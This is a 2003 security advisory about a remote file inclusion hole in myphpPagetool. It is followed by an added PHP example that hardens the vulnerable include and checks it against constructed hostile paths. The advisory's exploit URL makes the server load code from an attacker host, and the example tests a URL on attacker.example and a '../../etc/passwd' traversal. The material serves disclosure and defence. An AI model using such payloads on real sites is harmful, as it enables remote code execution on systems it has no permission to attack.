[VulnWatch] myphpPagetool (php)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/02/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sun, 02 Feb 2003 18:06:43 +0100
    
    

    Information :
    °°°°°°°°°°°°°
    Version : 0.4.3-1
    Website : http://myphppagetool.sourceforge.net/
    Problem : Include file

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php,
    help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :

    ----------------------------------------
    <?php
    include ($ptinclude . "/pt_config.inc");
    [...]
    ----------------------------------------

    Exploit :
    °°°°°°°°°
    http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
    with :
    http://[attacker]/pt_config.inc

    (if register_globals=On)

    Solution :
    °°°°°°°°°°
    A patch has been published on http://www.phpsecure.info .

    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/myphpPagetool.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools1

    frog-m@n
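
A hardened counterpart to the `include ($ptinclude . "/pt_config.inc")` line quoted in the advisory, as an added example that is not the patch published at phpsecure.info and not the project's code. The constant `PT_INCLUDE_DIR`, the function `pt_resolve_include()` and the temporary sandbox directory are hypothetical names and constructed test data; the point is that the include directory is fixed server-side and the resolved path must be a local file beneath it.

```php
<?php
declare(strict_types=1);

// Added example, not the published patch. PT_INCLUDE_DIR and
// pt_resolve_include() are hypothetical names.

/** Resolve $file inside $baseDir and refuse anything that escapes it. */
function pt_resolve_include(string $baseDir, string $file): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('include directory does not exist');
    }
    // realpath() only consults the local filesystem, so a URL cannot
    // resolve, and "../" sequences are collapsed before the prefix check.
    $full   = realpath($base . DIRECTORY_SEPARATOR . $file);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('refusing to include: ' . $file);
    }
    return $full;
}

// Constructed sandbox so the example runs offline.
$dir = sys_get_temp_dir() . '/pt_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/pt_config.inc', '<?php $pt_loaded = true;');

// The directory is a server-side constant. Request data ($_GET, or a
// global injected through register_globals) is never consulted.
define('PT_INCLUDE_DIR', $dir);
include pt_resolve_include(PT_INCLUDE_DIR, 'pt_config.inc');
var_dump($pt_loaded);

// Constructed hostile values of the kind the advisory describes.
foreach (['http://attacker.example/pt_config.inc', '../../etc/passwd'] as $bad) {
    try {
        pt_resolve_include(PT_INCLUDE_DIR, $bad);
        echo "accepted: $bad\n";
    } catch (RuntimeException $e) {
        echo $e->getMessage(), "\n";
    }
}

unlink($dir . '/pt_config.inc');
rmdir($dir);
```

`register_globals` was removed in PHP 5.4.0, but the same rule applies to any variable read from `$_GET` or `$_REQUEST` that ends up in an `include` path.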
